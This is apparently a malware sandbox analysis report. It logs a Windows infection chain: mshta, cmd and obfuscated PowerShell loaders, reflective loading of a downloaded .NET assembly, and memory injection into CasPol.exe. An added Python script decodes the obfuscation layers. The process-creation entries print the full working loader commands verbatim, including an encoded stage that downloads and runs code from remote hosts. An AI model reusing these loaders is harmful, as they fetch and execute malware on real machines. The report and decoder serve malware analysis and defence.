                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 11C3008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418754 mouse_event
                      Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prasonJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfhvvuxxnfnwuvbuicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklvrzueugicagicagicagicagicagicagicagicagicagicagicaglu1ltujfumrlrklusvrjt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrhf0t0f2shosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihdzrkvwdvpjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagryx1aw50icagicagicagicagicagicagicagicagicagicagicagiehneu1abvpwleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbocwzkb1lkbeduktsnicagicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicagicj6tujpbsigicagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfjrsagicagicagicagicagicagicagicagicagicagicagicbsehlebcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicryvvvmctrtvlfqvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzc0ljiwoc44mc4yndgvndmvc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwviywnrlnrjriisiirltly6qvbqrefuqvxzzwv3agf0awftzg9pbmdmb3j5b3v3axroz3jlyxruzxnzdghpbmdzz2l2zw5tzwiudmjtiiwwldapo3nuyxjulvnmruvwkdmpo0ludk9lzs1lefbyzvnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwvilnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jfhvvuxxnfnwuvbuicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklvrzueugicagicagicagicagicagicagicagicagicagicagicaglu1ltujfumrlrklusvrjt24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbg1vtiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagrhf0t0f2shosc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihdzrkvwdvpjccxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagryx1aw50icagicagicagicagicagicagicagicagicagicagicagiehneu1abvpwleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbocwzkb1lkbeduktsnicagicagicagicagicagicagicagicagicagicagicagic1uqw1ficagicagicagicagicagicagicagicagicagicagicagicj6tujpbsigicagicagicagicagicagicagicagicagicagicagicaglu5htuvtcgfjrsagicagicagicagicagicagicagicagicagicagicagicbsehlebcagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicryvvvmctrtvlfqvdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzc0ljiwoc44mc4yndgvndmvc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwviywnrlnrjriisiirltly6qvbqrefuqvxzzwv3agf0awftzg9pbmdmb3j5b3v3axroz3jlyxruzxnzdghpbmdzz2l2zw5tzwiudmjtiiwwldapo3nuyxjulvnmruvwkdmpo0ludk9lzs1lefbyzvnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcc2vld2hhdglhbwrvaw5nzm9yew91d2l0agdyzwf0bmvzc3roaw5nc2dpdmvubwvilnziuyi='+[char]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $combo = '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';$prason = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($combo));invoke-expression $prason
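                      The process-creation entries above record the whole loader chain. The mshta -> cmd -> powershell command line (`-ex bypass -nop -w 1` is ExecutionPolicy Bypass, NoProfile, WindowStyle Hidden) never contains "::" or a double quote literally: it glues single-quoted fragments with `[char]0x3a`, `[char]58`, `[char]34` and `[char]0x22`, feeds the glued text to invoke-expression, and the inner text base64-decodes to the next script. The `$combo` string in the wscript.exe -> powershell.exe entry is that next layer; base64-decoding it gives a script that downloads from a res.cloudinary.com URL, cuts the text between the markers `<<BASE64_START>>` and `<<BASE64_END>>`, reverses it, base64-decodes the result, passes the bytes to `[System.Reflection.Assembly]::Load`, and invokes `[dnlib.IO.Home].GetMethod('VAI')` with arguments that are themselves stored reversed (the first one is a paste.ee URL, another is the string `CasPol`, which matches the CasPol.exe image written at base 400000 starting with 4D5A above). The following Python is an added example, not code from the report, the sample or Joe Sandbox: it automates exactly those steps. The command line and the "image" it runs on are constructed here to have the same shape as the real ones (the hypothetical host `img.example.invalid` and the stub payload are ours); the real base64 blob is the one in the entries above and can be passed to the same functions.

```python
"""Decode the two layers of PowerShell obfuscation recorded in this report."""
import base64
import re

# A PowerShell expression glued from '...' literals and [char]N pieces.
# PowerShell is case-insensitive, so [chaR]0X22 and [char]0x22 are the same.
_TOKEN_RE = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
_B64_ARG_RE = re.compile(r'''frombase64string\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)''', re.I)


def collapse_char_concat(expr: str) -> str:
    """Evaluate an expression made only of 'literals' and [char]N codes."""
    pieces = []
    for literal, code in _TOKEN_RE.findall(expr):
        if code:
            pieces.append(chr(int(code, 16 if code.lower().startswith("0x") else 10)))
        else:
            pieces.append(literal)
    return "".join(pieces)


def decode_frombase64_arg(ps_text: str) -> str:
    """Return the UTF-8 text inside the first FromBase64String("...") call."""
    m = _B64_ARG_RE.search(ps_text)
    if m is None:
        raise ValueError("no FromBase64String() argument found")
    return base64.b64decode(m.group(1), validate=True).decode("utf-8")


def decode_stage1(cmdline: str) -> str:
    """mshta -> cmd -> powershell command line  ->  the script it really runs."""
    glued = cmdline[cmdline.lower().index("invoke-expression("):]
    return decode_frombase64_arg(collapse_char_concat(glued))


def carve_reversed_payload(blob: bytes, start: bytes = b"<<BASE64_START>>",
                           end: bytes = b"<<BASE64_END>>") -> bytes:
    """Stage 2: cut the text between the markers, reverse it, base64-decode it."""
    i = blob.find(start)
    j = blob.find(end, i + len(start)) if i >= 0 else -1
    if i < 0 or j < 0:
        raise ValueError("payload markers not found in downloaded file")
    reversed_b64 = blob[i + len(start):j]
    return base64.b64decode(reversed_b64[::-1], validate=True)


def reverse_arg(s: str) -> str:
    """Arguments handed to the loaded assembly are stored reversed as well."""
    return s[::-1]


# --- constructed samples (same shape as the report's entries, not the real blobs) ---
STAGE2_SCRIPT = (
    "$img = 'https://img.example.invalid/stage.jpg';"  # hypothetical host
    "$txt = [System.Text.Encoding]::UTF8.GetString((New-Object System.Net.WebClient).DownloadData($img));"
    "$a = $txt.IndexOf('<<BASE64_START>>') + 16; $b = $txt.IndexOf('<<BASE64_END>>');"
    "$rev = -join ($txt.Substring($a, $b - $a).ToCharArray())[-1..-($b - $a)];"
    "[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($rev))"
)
_B64 = base64.b64encode(STAGE2_SCRIPT.encode("utf-8")).decode("ascii")
STAGE1_CMDLINE = (
    '"c:\\windows\\system32\\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c '
    "devicecredentialdeployment ; invoke-expression($(invoke-expression("
    "'[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'"
    "+[char]58+[char]0x3a+'frombase64string('+[char]34+'" + _B64 + "'+[char]0x22+'))')))\""
)
FAKE_PE = b"MZ" + b"\x90" * 62 + b"constructed stand-in for the downloaded .NET assembly"
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00 constructed junk that precedes the markers "
    + b"<<BASE64_START>>" + base64.b64encode(FAKE_PE)[::-1] + b"<<BASE64_END>>"
    + b" trailing junk \xff\xd9"
)

if __name__ == "__main__":
    stage2 = decode_stage1(STAGE1_CMDLINE)
    print("stage 2 script:", stage2[:80], "...")
    payload = carve_reversed_payload(FAKE_IMAGE)
    print("carved payload header:", payload[:2], "size:", len(payload))
    print("first VAI argument, un-reversed:", reverse_arg("0/nKNt3/r/ee.etsap//:sptth"))
```

`collapse_char_concat` only understands string literals and `[char]N`, which is all this loader uses; anything else in the expression is dropped, so check the collapsed text before trusting it. `carve_reversed_payload` refuses input without both markers, and a real carve should be followed by a check that the bytes start with `MZ` before anything else is done with them.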
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00433E0A cpuid
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004470AE EnumSystemLocalesW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004510BA GetLocaleInfoW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004511E3 GetLocaleInfoW,GetLocaleInfoW,GetACP
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004512EA GetLocaleInfoW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004513B7 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00447597 GetLocaleInfoW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040E679 GetLocaleInfoA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00450A7F IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00450CF7 EnumSystemLocalesW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00450D42 EnumSystemLocalesW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00450DDD EnumSystemLocalesW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00450E6A GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical entries)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 identical entries)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
